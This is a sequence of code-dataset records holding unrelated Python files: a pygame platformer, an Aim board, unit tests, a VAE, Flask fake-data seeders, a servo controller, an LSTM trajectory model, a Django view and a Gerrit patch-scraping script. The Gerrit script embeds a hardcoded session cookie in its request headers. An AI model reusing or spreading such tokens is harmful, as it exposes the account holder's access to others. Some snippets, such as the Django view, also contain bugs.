platform; only expect one of these\n elif sticky_color == \"orange\":\n p = SpawnSticky(debug_mode=self.debug_mode,*plat)\n self.safeplatforms.add(p)\n self.spawnplatform.add(p)\n # Add spawn coords to overall StickyJump game settings\n self.xspawn = p.rect.x\n self.yspawn = p.rect.y\n \n elif sticky_color == \"pink\":\n # If it's a death sticky, it belongs to a group of platforms reserved for death stickies\n p = DieSticky(debug_mode=self.debug_mode,*plat)\n self.deathplatforms.add(p)\n \n self.all_sprites.add(p)\n \n def spawnplayer(self):\n \"\"\"Spawn in Player at spawn sticky\"\"\"\n self.player = Player(self, self.xspawn, self.yspawn)\n self.all_sprites.add(self.player)\n \n # Player begins stationary in x direction\n self.player.vel = vec(0, 0)\n self.player.acc = vec(0, 0)\n \n def win_condition(self):\n #Displays win screen and then starts new game\n self.message_display('You Win!')\n time.sleep(1.25)\n self.new()\n \n def new(self, resticky=False):\n \"\"\"Start a new game\"\"\"\n if resticky:\n print(\"attempting to resticky\")\n self.cv_data = updateSticky()\n print(self.cv_data)\n \n # Define groups and subgroups of platforms\n self.all_sprites = pg.sprite.Group()\n self.safeplatforms = pg.sprite.Group()\n self.spawnplatform = pg.sprite.GroupSingle()\n self.winplatform = pg.sprite.GroupSingle()\n self.deathplatforms = pg.sprite.Group()\n \n #Fill out groups of platforms using CV data\n self.read_cv_data()\n \n #Spawn player and enter master game loop\n self.spawnplayer()\n self.win_state = False\n self.run()\n\n def run(self):\n \"\"\"Master Game Loop\"\"\"\n self.playing = True\n while self.playing:\n self.clock.tick(FPS)\n # Update player's position and handle collisions with platforms\n self.update()\n # Checks for keystrokes that alter player or game state\n self.events() \n # Redraws game in window accordingly\n self.draw() \n \n if not self.playing:\n pg.QUIT()\n\n def update(self):\n \"\"\"Game Loop - Update\"\"\"\n # Updates Player sprite directly, allowing for movement along x-axis and falling along y-axis\n self.all_sprites.update()\n\n if self.win_state:\n self.win_condition()\n \n # Handles when player falls and collides with different types of platforms\n if self.player.vel.y > 0:\n \n # Falling collision with safe (orange, blue, green) platform\n hits = pg.sprite.spritecollide(self.player, self.safeplatforms, False)\n if hits:\n # Kill player's velocity at point of collision\n self.player.pos.y = hits[0].rect.top\n self.player.vel.y = 0\n \n # Handles win sequence if player falls onto win (green) platform\n wins = pg.sprite.spritecollide(self.player, self.winplatform, False)\n if wins:\n self.win_state = True\n \n # If collision with death (pink) platform, kill player and then respawn\n dead = pg.sprite.spritecollide(self.player, self.deathplatforms, False) #Checks for collision with death platform\n if dead:\n self.player.kill()\n self.player.remove()\n sleep(0.5)\n self.spawnplayer()\n\n def events(self):\n \"\"\"Game Loop - Keystroke Events\"\"\"\n for event in pg.event.get():\n if event.type == pg.KEYDOWN:\n \n # Escape key exits game\n if event.key == pg.K_ESCAPE:\n if self.playing:\n self.playing = False\n self.running = False\n \n # Spacebar mapped to jump\n if event.key == pg.K_SPACE:\n self.player.jump()\n \n # 'U' key means resticky and start new game\n if event.key == pg.K_u:\n print(\"restickying\")\n self.resticky()\n \n def draw(self):\n \"\"\"Game Loop - Draw\"\"\"\n self.screen.fill(BLACK)\n self.all_sprites.draw(self.screen)\n # *after* drawing 
everything, flip the display\n pg.display.flip()\n \n def resticky(self):\n \"\"\" **WORK IN PROGRESS**\n Handles changes to sticky note layout and builds new game accordingly\n \"\"\"\n print(\"restickying!\")\n self.new(True)\n \n # Extraneous for now\n delay = 250 # 500ms = 0.5s\n \n current_time = pg.time.get_ticks()\n change_time = current_time + delay\n show = True\n \n def text_objects(self, text, font):\n \"\"\"Helper function for message_display\"\"\"\n textSurface = font.render(text, True, WHITE)\n return textSurface, textSurface.get_rect()\n \n def message_display(self, text):\n \"\"\"Displays message in center of game window\"\"\"\n largeText = pg.font.Font('freesansbold.ttf',115)\n TextSurf, TextRect = self.text_objects(text, largeText)\n TextRect.center = ((WIDTH/2),(HEIGHT/2))\n self.screen.blit(TextSurf, TextRect)\n pg.display.update()\n\n def show_start_screen(self):\n \"\"\"game splash/start screen\"\"\"\n pass\n\n def show_go_screen(self):\n \"\"\"game over/continue\"\"\"\n pass\n\n","sub_path":"StickyAR/StickyJump.py","file_name":"StickyJump.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"448114845","text":"from asp import TextSequence\nimport math\n\nc_hash = session_state.get('container_hash')\n\nif c_hash is None:\n ui.header('Texts')\n form = ui.form(\"Search\")\n query = form.text_input(value=\"\")\n\ntexts = TextSequence.filter(f'c.hash==\"{c_hash}\"' if c_hash else query)\n\n\ndef flatten(dictionary, parent_key='', separator='.'):\n items = []\n for key, value in dictionary.items():\n new_key = parent_key + separator + key if parent_key else key\n if isinstance(value, dict):\n items.extend(flatten(value, new_key, separator=separator).items())\n else:\n items.append((new_key, value))\n return dict(items)\n\n\n@memoize\ndef merge_dicts(dict1, dict2):\n merged_dict = dict1.copy()\n merged_dict.update(dict2)\n return merged_dict\n\n\n@memoize\ndef get_table_data(data=[], keys=[], page_size=10, page_num=1):\n table_data = {}\n page_data = data[(page_num - 1) * page_size:page_num * page_size]\n\n def append(key, value):\n if key in table_data:\n table_data[key].append(f'{value}')\n else:\n table_data[key] = [f'{value}']\n\n for key in keys:\n for i, page_item in enumerate(page_data):\n flattened_item = flatten(page_item)\n item = merge_dicts(page_item, flattened_item)\n if key == 'data':\n value = ((page_num - 1) * page_size) + i\n append(key, value)\n elif key in item:\n value = item[key]\n append(key, value)\n\n return table_data\n\n\nif texts:\n row1, row2 = ui.rows(2)\n\n items_per_page = row1.select('Items per page', ('5', '10', '50', '100'))\n total_pages = math.ceil((len(texts) / int(items_per_page)))\n page_numbers = [str(i) for i in range(1, total_pages + 1)]\n page_num = row1.select('Page', page_numbers, index=0)\n\n table_data = get_table_data(\n data=texts,\n keys=['name', 'container.hash', 'context',\n 'format', 'range', 'data', 'step', 'index'],\n page_size=int(items_per_page),\n page_num=int(page_num)\n )\n\n row2.table(table_data, {\n 'container.hash': lambda val: ui.board_link('run.py', val, state={'container_hash': val}),\n 'data': lambda val: ui.texts([texts[int(val)]])\n })\nelse:\n text = ui.text('No texts found')\n","sub_path":"pkgs/aimstack/asp/boards/texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"267283115","text":"import unittest\nimport os\nfrom interview_prep.puzzles.analyze_text import analyze_text\n\n\nclass AnalyzeTextTests(unittest.TestCase):\n \"\"\"Tests for the ''analyze_text()'' function.\"\"\"\n\n def setUp(self):\n \"\"\"Fixture to create a file to test\"\"\"\n self.filename = 'analyze_text_file.txt'\n with open(self.filename, 'w') as f:\n f.write('We the People of the United States, in Order to form a more perfect Union, establish Justice, '\n 'insure domestic Tranquility, provide for the common defence, promote the general Welfare, '\n 'and secure the Blessings of Liberty to ourselves and our Posterity, do ordain and establish '\n 'this Constitution for the United States of America.\\n'\n 'Article. I.\\nArticle. I.\\n'\n 'All legislative Powers herein granted shall be vested in a Congress of the United States, '\n 'which shall consist of a Senate and House of Representatives.\\n'\n 'Section. 2.\\nThe House of Representatives shall be composed of Members chosen every second '\n 'Year by the People of the several States, and the Electors in each State shall have the '\n 'Qualifications requisite for Electors of the most numerous Branch of the State Legislature.')\n\n def tearDown(self):\n \"\"\"Fixture to delete test file\"\"\"\n try:\n os.remove(self.filename)\n except:\n pass\n\n def test_function_runs(self):\n analyze_text(self.filename)\n\n def test_line_numbers(self):\n self.assertEqual(6, analyze_text(self.filename)[0])\n\n def test_char_numbers(self):\n self.assertEqual(773, analyze_text(self.filename)[1])\n\n def test_no_such_file(self):\n with self.assertRaises(IOError):\n analyze_text('foo')\n\n def test_no_deletion(self):\n \"\"\"Check that function doesn't delete the input file\"\"\"\n analyze_text(self.filename)\n self.assertTrue(os.path.exists(self.filename))\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"interview_prep/puzzles/analyze_text_tests.py","file_name":"analyze_text_tests.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595962574","text":"\"\"\"\nThis code is sourced from the repo https://github.com/pytorch/examples\n All credit goes to the original author\n\"\"\"\nfrom __future__ import print_function\nimport torch\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\nfrom enum import Enum\n\nclass Dataset(Enum):\n mnsit = 1\n fashion_mnist = 2\n\n\n# configuration parameters\nepochs=10\nbatch_size=128\ndata_dir='../data' #dir to download dataset\noutput_dir='/results/results-vae/' # output dir\ndata_set=Dataset.fashion_mnist\n\nclass VAE:\n def __init__(self,train_data,test_data):\n self.model=Model()\n self.train_data=train_data\n self.test_data=test_data\n # initialize optimizer\n # adam optimizer is used instead of adagrad for better convergence\n self.optimizer = optim.Adam(self.model.parameters(), lr=1e-3)\n\n # loss function defined as sum of KL divergence and reconstruction loss\n def loss_function(self,recon_x, x, mu, logvar):\n recon_loss = functional.binary_cross_entropy(recon_x, x.view(-1, 784), reduction='sum')\n kld = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n return recon_loss + kld\n\n def train(self,epoch):\n self.model.train()\n train_loss = 0\n for batch_index, (data, _) in enumerate(train_data):\n self.optimizer.zero_grad()\n recon_batch, mu, logvar = 
self.model(data)\n loss = self.loss_function(recon_batch, data, mu, logvar)\n loss.backward()\n train_loss += loss.item()\n self.optimizer.step()\n if batch_index % 100 == 0:\n print('Epoch: {} \\tLoss: {:.6f}'.format(epoch, loss.item() / len(data)))\n print('Average Train loss: {:.4f}'.format(train_loss / len(train_data.dataset)))\n\n def test(self):\n self.model.eval()\n test_loss = 0\n with torch.no_grad():\n for i, (data, _) in enumerate(test_data):\n recon_batch, mu, logvar = self.model(data)\n test_loss += self.loss_function(recon_batch, data, mu, logvar).item()\n test_loss /= len(test_data.dataset)\n print('Test loss: {:.4f}'.format(test_loss))\n\n\nclass Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.fc1 = nn.Linear(784, 400)\n self.fc21 = nn.Linear(400, 20)\n self.fc22 = nn.Linear(400, 20)\n self.fc3 = nn.Linear(20, 400)\n self.fc4 = nn.Linear(400, 784)\n\n # ReLU are used instead of sigmoid function for faster computation\n def encode(self, x):\n h1 = functional.relu(self.fc1(x))\n return self.fc21(h1), self.fc22(h1)\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self, z):\n h3 = functional.relu(self.fc3(z))\n return torch.sigmoid(self.fc4(h3))\n\n def forward(self, x):\n mu, logvar = self.encode(x.view(-1, 784))\n z = self.reparameterize(mu, logvar)\n return self.decode(z), mu, logvar\n\n\n# download the Fashion-MNIST data using torchvision dataset\nif data_set==Dataset.fashion_mnist:\n train_data = torch.utils.data.DataLoader(datasets.FashionMNIST(data_dir, train=True, download=True, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\n test_data = torch.utils.data.DataLoader(datasets.FashionMNIST(data_dir, train=False, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\nelse:\n train_data = torch.utils.data.DataLoader(datasets.MNIST(data_dir, train=True, download=True, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\n test_data = torch.utils.data.DataLoader(datasets.MNIST(data_dir, train=False, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\n\nvae=VAE(train_data,test_data)\n# start training the model\nfor epoch in range(1, epochs + 1):\n vae.train(epoch)\n vae.test()\n with torch.no_grad():\n # generate samples\n sample = torch.randn(64, 20)\n sample = vae.model.decode(sample).cpu()\n save_image(sample.view(64, 1, 28, 28), output_dir + 'img_vae_' +str(epoch) + '.png')\n\n","sub_path":"deep-generative/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"288521955","text":"import random\nfrom myblog.models import Admin, Post, Category, Comment, Link\nfrom myblog.extensions import db\nfrom faker import Faker\nfrom sqlalchemy.exc import IntegrityError\n\nfake = Faker()\n\n\ndef fake_admin():\n admin = Admin(\n username='admin',\n blog_title='FakeBlog',\n blog_sub_title=\"I'm a fake blog\",\n name='Whale Liu',\n about='um....I actually a fake blog.',\n\n )\n db.session.add(admin)\n db.session.commit()\n\n\ndef fake_categories(count=10):\n categories = Category(name='Default')\n db.session.add(categories)\n\n for i in range(count):\n category = Category(name=fake.word())\n db.session.add(category)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef fake_posts(count=50):\n for i in range(count):\n post = Post(\n 
title=fake.sentence(),\n body=fake.text(1500),\n category=Category.query.get(random.randint(1, Category.query.count())),\n timestamp=fake.date_time_this_year()\n )\n db.session.add(post)\n db.session.commit()\n\n\ndef fake_comments(count=500):\n for i in range(count):\n comment = Comment(\n author=fake.name(),\n body=fake.sentence(),\n timestamp=fake.date_time_this_year(),\n post=Post.query.get(random.randint(1, Post.query.count()))\n )\n db.session.add(comment)\n\n # from admin\n comment = Comment(\n author='Whale Liu',\n body=fake.sentence(),\n timestamp=fake.date_time_this_year(),\n from_admin=True,\n post=Post.query.get(random.randint(1, Post.query.count()))\n )\n db.session.add(comment)\n db.session.commit()\n\n salt = int(count/10)\n # replies\n for i in range(salt):\n comment = Comment(\n author=fake.name(),\n body=fake.sentence(),\n timestamp=fake.date_time_this_year(),\n replied=Comment.query.get(random.randint(1, Comment.query.count())),\n post=Post.query.get(random.randint(1, Post.query.count()))\n )\n db.session.add(comment)\n db.session.commit()\n\n\ndef fake_links():\n twitter = Link(name='Twitter', url='#')\n facebook = Link(name='Facebook', url='#')\n linkedin = Link(name='LinkedIn', url='#')\n google = Link(name='Google+', url='#')\n db.session.add_all([twitter, facebook, linkedin, google])\n db.session.commit()\n","sub_path":"myblog/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250689486","text":"from robot import Robot\nfrom servo import Servo\nimport math\nimport Adafruit_PCA9685\n\nFREQ = 60; \njoints = dict()\n\npwm = Adafruit_PCA9685.PCA9685() \npwm.set_pwm_freq(FREQ); \n\n\"\"\"\n#Foot Servo\nFOOT_CHANNEL = 0\nFOOT_MINTIME = \nFOOT_MAXTIME = \n\nfoot = Servo(pwm, FOOT_CHANNEL, FOOT_MINTIME, FOOT_MAXTIME)\n\njoints['foot'] = foot;\n\"\"\"\n\n#Shoulder Servo - HS755HB\nSHOULDER_CHANNEL = 1\nSHOULDER_MINTIME = 600\nSHOULDER_MAXTIME = 2200\n\nshoulder = Servo(pwm, SHOULDER_CHANNEL, SHOULDER_MINTIME, SHOULDER_MAXTIME)\njoints['shoulder'] = shoulder\n\n#Elbow Servo - HS645MG\nELBOW_CHANNEL = 2\nELBOW_MINTIME = 390\nELBOW_MAXTIME = 2050\n\nelbow = Servo(pwm, ELBOW_CHANNEL, ELBOW_MINTIME, ELBOW_MAXTIME)\njoints['elbow'] = elbow\n\n#Wrist Servo - HS425BB \nWRIST_CHANNEL = 3\nWRIST_MINTIME = 553\nWRIST_MAXTIME = 2520\n\nwrist = Servo(pwm, WRIST_CHANNEL, WRIST_MINTIME, WRIST_MAXTIME)\njoints['wrist'] = wrist\n\n#Neck Servo - HS422\nNECK_CHANNEL = 4\nNECK_MINTIME = 610\nNECK_MAXTIME = 2590\n\nneck = Servo(pwm, NECK_CHANNEL, NECK_MINTIME, NECK_MAXTIME)\njoints['neck'] = neck\n\n#Phone Servo - HS311\nPHONE_CHANNEL = 5\nPHONE_MINTIME = 500\nPHONE_MAXTIME = 2520\n\n#phone = Servo(pwm, PHONE_CHANNEL, PHONE_MINTIME, PHONE_MAXTIME)\n#joints['phone'] = phone\nrobit = Robot(joints)\n\nmoveSet = {\n 'shoulderGoal': 40, \n 'elbowGoal' : 70, \n 'wristGoal' : 40, \n 'neckGoal' : 76, \n 'shoulderOffset' : 10, \n 'elbowOffset' : 30, \n 'wristOffset' : 60, \n 'neckOffset' : 65 \n}\n\ntheta = 0.0\n\n\nwhile(True):\n \n for joint in joints:\n currOffset = moveSet[joint + 'Offset']\n currGoal = moveSet[joint + 'Goal']\n\n robit.setJoint(joint, currOffset + (((1+math.sin(theta)) * (currGoal - currOffset)))); \n\n #robit.setJoint('shoulder', 10 + (((1+math.sin(theta)) * (movementGoal-10))));\n #robit.setJoint('elbow', 10 + (((1+math.sin(theta)) * (movementGoal-10))));\n \n theta += 0.006\n\n\n#if __name__ == '__main__':\n# robit.executeMove(dictionary)\n 
#robit.setManyAngles()\n","sub_path":"rasberryCode/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440690020","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\n\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import RepeatVector\n\nimport matplotlib as mpl\nimport pickle\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nimport os\n\n# seeding for reproducible results\nfrom numpy.random import seed\nseed(1)\ntf.random.set_seed(1)\n\n# Init NuScenes. Requires the dataset to be stored on disk.\nfrom nuscenes.nuscenes import NuScenes\nfrom nuscenes.map_expansion.map_api import NuScenesMap\n\nmatplotlib.rcParams['figure.figsize'] = (24, 18)\nmatplotlib.rcParams['figure.facecolor'] = 'white'\nmatplotlib.rcParams.update({'font.size': 20})\n\nTRAIN_SIZE = 9800\nTRAIN_TIME = 6\nBATCH_SIZE = 32\nBUFFER_SIZE = 500\n\n\n# In[2]:\n\n\ntotal_ped_matrix = np.load(\"details/ego_ped_matrix.npy\")\n\nwith open(\"details/ped_dataset.pkl\", 'rb') as f:\n ped_dataset = pickle.load(f)\n \nwith open(\"details/scene_info.pkl\", 'rb') as handle:\n scene_info = pickle.load(handle)\n\n\n# In[3]:\n\n\n# nusc = NuScenes(version='v1.0-trainval', \n# dataroot='../../../../../data/', \n# verbose=False)\n\n# so_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='singapore-onenorth')\n# bs_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='boston-seaport')\n# sh_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='singapore-hollandvillage')\n# sq_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='singapore-queenstown')\n\n# # dict mapping map name to map file\n# map_files = {'singapore-onenorth': so_map,\n# 'boston-seaport': bs_map,\n# 'singapore-hollandvillage': sh_map,\n# 'singapore-queenstown': sq_map}\n\n\n# In[4]:\n\n\n# # calculating the values for standardization for every feature\n# mean_values = np.mean(total_ped_matrix[:TRAIN_SIZE, :TRAIN_TIME, :], axis=(0,1))\n# std_values = np.std(total_ped_matrix[:TRAIN_SIZE, :TRAIN_TIME, :], axis=(0,1))\n\n# # standardization\n# total_ped_matrix = (total_ped_matrix - mean_values) / std_values\n\n\n# In[5]:\n\n\n# train_test split\nx_train = total_ped_matrix[:TRAIN_SIZE, :, :TRAIN_TIME, :]\n# reshaping into 3D\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[2],\n x_train.shape[1]*x_train.shape[3]))\ny_train1 = total_ped_matrix[:TRAIN_SIZE, 0, TRAIN_TIME:, :2]\ny_train2 = total_ped_matrix[:TRAIN_SIZE, 1, TRAIN_TIME:, :2]\n# shape is 9800,20,2\ny_train = np.append(y_train1, y_train2, axis=1)\n\nx_test = total_ped_matrix[TRAIN_SIZE:, :, :TRAIN_TIME, :]\n# reshaping into 3D\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[2],\n x_test.shape[1]*x_test.shape[3]))\ny_test1 = total_ped_matrix[TRAIN_SIZE:, 0, TRAIN_TIME:, :2]\ny_test2 = total_ped_matrix[TRAIN_SIZE:, 1, TRAIN_TIME:, :2]\n# shape is 2510,20,2\ny_test = np.append(y_test1, y_test2, axis=1)\n\n\n# In[6]:\n\n\ntrain_data = tf.data.Dataset.from_tensor_slices((x_train, y_train))\ntrain_data = train_data.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE).repeat()\n\nval_data = tf.data.Dataset.from_tensor_slices((x_test, y_test))\nval_data = val_data.batch(BATCH_SIZE).repeat()\n\n\n# In[7]:\n\n\n# 
defining the custom rmse loss function\ndef ttc_loss(gt_path, ego_path):\n print(ego_path)\n tot_ttc = 0.0\n tot_dist = 0.0\n for i in range(gt_path.shape[0]): #batch\n del_time = 0.0\n del_dist = np.inf\n for j in range(gt_path.shape[1]): #10 timesteps\n for k in range(ego_path.shape[1]):\n gt_pos = gt_path[i,j,:]\n ego_pos = ego_path[i,k,:]\n \n dist = np.sqrt(np.sum((gt_pos - ego_pos)**2))\n if dist < del_dist:\n del_dist = dist\n del_time = abs(j-k)\n \n tot_ttc += del_time\n tot_dist += del_dist\n tot_ttc = tot_ttc/float(len(gt_path))\n tot_dist = tot_dist/float(len(gt_path))\n return np.float32(tot_ttc) \n\ndef model_loss(gt, pred_path):\n '''\n calculates custom rmse loss between every time point\n '''\n gt_path = gt[:,:10,:]\n rmse_error = K.mean(K.sqrt(K.sum(K.square(gt_path-pred_path), axis=1)))\n \n ego_path = gt[:,10:,:]\n ttc_error = tf.numpy_function(ttc_loss, [gt_path, ego_path], tf.float32)\n # return 1./ttc_error\n return rmse_error + (2./(ttc_error+0.1))\n\ndef euc_dist(gt_path, pred_path):\n # custom metric to monitor rmse\n gt_path = gt_path[:,:10,:]\n return K.mean(K.sqrt(K.sum(K.square(gt_path-pred_path), axis=1))) \n\n\n# In[8]:\n\n\nlstm_model = tf.keras.models.Sequential()\nlstm_model.add(LSTM(32, input_shape=x_train.shape[-2:]))\nlstm_model.add(RepeatVector(10))\nlstm_model.add(LSTM(16, return_sequences=True,activation='relu'))\nlstm_model.add(LSTM(8, return_sequences=True,activation='relu'))\nlstm_model.add(TimeDistributed(\n Dense(2, activation='linear')))\n\nlstm_model.compile(optimizer='adam', \n loss=model_loss, metrics=[euc_dist])\n\n\n# In[9]:\n\n\nlstm_model.summary()\n\n\n# In[10]:\n\n\n# checkpoint for saving the best model\nfilepath=\"../checkpoints/lstm_ttc_dist_gt.hdf5\"\ncheckpoint = tf.keras.callbacks.ModelCheckpoint(filepath, monitor='val_euc_dist', \n verbose=1, save_best_only=True, mode='min')\ncallbacks_list = [checkpoint]\n\ntrain_history = lstm_model.fit(train_data, epochs=40,\n verbose=1, callbacks=None,\n validation_data=val_data,\n steps_per_epoch=300,\n validation_steps=70\n )\n\n\n# In[11]:\n\n\ndef plot_train_history(history, title):\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs = range(len(loss))\n\n plt.figure()\n\n plt.plot(epochs, loss, 'b', label='Training loss')\n plt.plot(epochs, val_loss, 'r', label='Validation loss')\n plt.title(title)\n plt.legend()\n\n plt.show()\n\n\n# In[12]:\n\n\nplot_train_history(train_history, \"MLP train and validation loss\")\n\n\n# In[13]:\n\n\n# undo normalization for plotting\ndef move_from_origin(l, origin):\n x0, y0 = origin\n return [[x + x0, y + y0] for x, y in l]\n\ndef rotate_from_y(l, angle):\n theta = -angle\n return [(x*np.cos(theta) - y*np.sin(theta), \n x*np.sin(theta) + y*np.cos(theta)) for x, y in l]\n\n# loss calculation for test prediction\ndef rmse_error(l1, l2):\n loss = 0.0\n \n if len(np.array(l1).shape) < 2:\n return ((l1[0] - l2[0])**2 + (l1[1] - l2[1])**2)**0.5\n for p1, p2 in zip(l1, l2):\n loss += ((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)**0.5\n return (loss / float(len(l1)))\n\n\n# In[14]:\n\n\nade_values = []\nfde_values = []\n\nfor test_idx in range(TRAIN_SIZE, len(ped_dataset)):\n test_data = total_ped_matrix[test_idx:test_idx+1,:,:6,:]\n test_data = np.reshape(test_data, (test_data.shape[0], test_data.shape[2],\n test_data.shape[1]*test_data.shape[3]))\n predictions = lstm_model.predict(test_data).reshape(-1, 2)\n predictions = move_from_origin(rotate_from_y(predictions, ped_dataset[test_idx][\"angle\"]),\n 
ped_dataset[test_idx][\"origin\"])\n\n# n_scene = ped_dataset[test_idx][\"scene_no\"]\n# ego_poses = map_files[scene_info[str(n_scene)][\"map_name\"]].render_egoposes_on_fancy_map(\n# nusc, scene_tokens=[nusc.scene[n_scene]['token']], verbose=False,\n# render_egoposes=True, render_egoposes_range=False, \n# render_legend=False)\n\n# plt.scatter(*zip(*np.array(ped_dataset[test_idx][\"translation\"])[:6,:2]), c='k', s=5, zorder=2)\n# plt.scatter(*zip(*np.array(ped_dataset[test_idx][\"translation\"])[6:,:2]), c='b', s=5, zorder=3)\n# plt.scatter(*zip(*predictions), c='r', s=5, zorder=4)\n# plt.show()\n \n loss = rmse_error(predictions, \n np.array(ped_dataset[test_idx][\"translation\"])[6:,:2])\n final_loss = rmse_error(predictions[-1], \n np.array(ped_dataset[test_idx][\"translation\"])[-1,:2])\n\n \n# print(f\"Loss in m is {loss}\")\n# print(f\"Loss of final position in m is {final_loss}\")\n \n ade_values.append(loss)\n fde_values.append(final_loss)\n \nprint(np.mean(np.array(ade_values)))\nprint(np.mean(np.array(fde_values)))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"python-sdk/nuscenes/map_expansion/LSTM_ttc_dist_gt.py","file_name":"LSTM_ttc_dist_gt.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250647497","text":"from django.http.response import HttpResponse, JsonResponse, DjangoJSONEncoder\nfrom core.models import Genre, Movie\nimport json\n\n#ping-pong for tests\ndef ping(request):\n return HttpResponse(\"pong\")\n\ndef getGenres(request, start, end):\n result = []\n for item in Genre.objects.all()[start : end]:\n result.append(\n {\n 'id': item,\n 'name': 'item.name'\n }\n )\n return JsonResponse(json.dumps(result), safe=False)","sub_path":"MyMovieList/core/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163996082","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\nimport requests\nimport json\nimport re\nimport csv\nimport time\nimport os\nimport sys\nimport getpass\nimport XmlUtils\n#import matplotlib.pyplot as plt\n#import pandas\n#import numpy as np\n\n\n###################################################\n# Global Constants Start\n###################################################\n# gerrit网址\nGERRIT_DOMAIN = 'https://gerrit9.huaqin.com:9443/'\n\n# gerrit查询链接\nQUERY_URL = GERRIT_DOMAIN + 'changes/?q=owner:self+status:merged&n=25&O=81'\n\n# 本地代码环境路径\nLOCAL_CODE_BASE = '/base/code/sony/226-s-20210822'\n\n# manifest.xml\nMANIFEST_SOFT_LINK = '/.repo/manifest.xml'\n\n# 每页commit个数\nCHANGES_PER_PAGE = 25\n\n# 具体某个提交的gerrit链接前缀\nCERTAIN_LINK_PREFIX = GERRIT_DOMAIN + '#/c/'\n\n# 请求头带Cookie (cookie根据实时变化)\nCOOKIE_HEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\n 'Cookie': 'GerritAccount=aPemfaAbq74UhogBKpPnqrG8anftrZDw'}\n\n# 输出的目录\nEXPORT_DIR_PATH = '/home/ubuntu/bak/patch/sony/'\n\n# 输出csv的路径\nEXPORT_CSV_PATH = EXPORT_DIR_PATH + 'gerrit.csv'\n\n# 具体某个提交的gerrit链接请求模板, {}($1)占位为_number\nCERTAIN_LINK_TEMPLATE = GERRIT_DOMAIN + 'changes/{}/detail?O=10004'\n\n# 具体某个提交的gerrit patch , $1 -- _number , $2 --- commit_id\nDOWNLOAD_LINK_TEMPLATE = GERRIT_DOMAIN + \"changes/{}/revisions/{}/patch?zip\"\n\n# 每次请求的间隔时间\n# (总体的提交记录只需要单独爬几页,但是具体提交的commit_id需要请求到具体的gerrit链接,请求次数会较多)\nREQUEST_INTERVAL = 3\n\n# 登录url\nLOGIN_URL = GERRIT_DOMAIN + \"login/%23%2Fq%2Fstatus%3Aopen\"\n\n# 
登录时的请求头\nLOGIN_REQUEST_HEADER = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'\n}\n\n# 状态码200(成功)\nSTATUS_CODE_OK = 200\n\n# 缩写的commit id (取前7位,参看git ll)\nSHORT_COMMIT_ID_LENGTH = 7\n\n# 输出date的格式\nCURRENT_DATE_PATTERN = '%Y%m%d%H%M'\n\n# 路径的分隔符\nPATH_SPERATOR = \"/\"\n\n###################################################\n# Global Constants End\n###################################################\n\n\n###################################################\n# Global Variable Start\n###################################################\n\n# 生成patch的方式\n#\n# 0 -- 不生成patch\n# 1 -- 从gerrit上下载patch\n# 2 -- 从本地代码中生成patch \nget_patch_method = 0\n\n###################################################\n# Global Variable End\n###################################################\n\n#############################################################\n# 请求访问接口,获取到json格式数据,稍加处理,写入表格。\n# 返回继续标志continue_flag,下一页URl。\n#\n# add by HQ hujingcheng 20211218 \n#############################################################\ndef request_general_info(connect_session, url, continue_flag):\n continue_flag = 1 + continue_flag\n response_data = None\n if connect_session is not None:\n response_data = connect_session.get(url, headers=LOGIN_REQUEST_HEADER)\n else:\n response_data = requests.get(url, 